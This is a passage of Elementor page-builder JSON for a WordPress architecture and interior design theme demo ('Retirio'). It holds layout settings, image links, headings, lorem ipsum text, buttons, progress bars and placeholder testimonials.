end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT INTERIOR\",\"title\":\"We provide the best\\narchitect & interior\\ndesign services\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Our signature design process comes standard\\u2026refresh, remodel, new and enjoyable design experience\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Detail\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"015c584\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"200\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"180\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"animation\":\"fadeInUp\",\"animation_tablet\":\"none\",\"animation_delay\":200},\"elements\":[{\"id\":\"f11899a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"b5b032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Trust the experts for all your <strong style=\\\"color: #242424;\\\">architects &amp; interior needs.<\\/strong><\\/p>\",\"text_color\":\"#9C9C9C\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"600\",\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"60\",\"bottom\":\"15\",\"left\":\"40\",\"isLinked\":false},\"_element_width\":\"auto\",\"_background_background\":\"classic\",\"_background_color\":\"#F5F5F5\",\"align_mobile\":\"center\",\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6c98d6d\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Service\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"40\",\"bottom\":\"25\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/services\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike 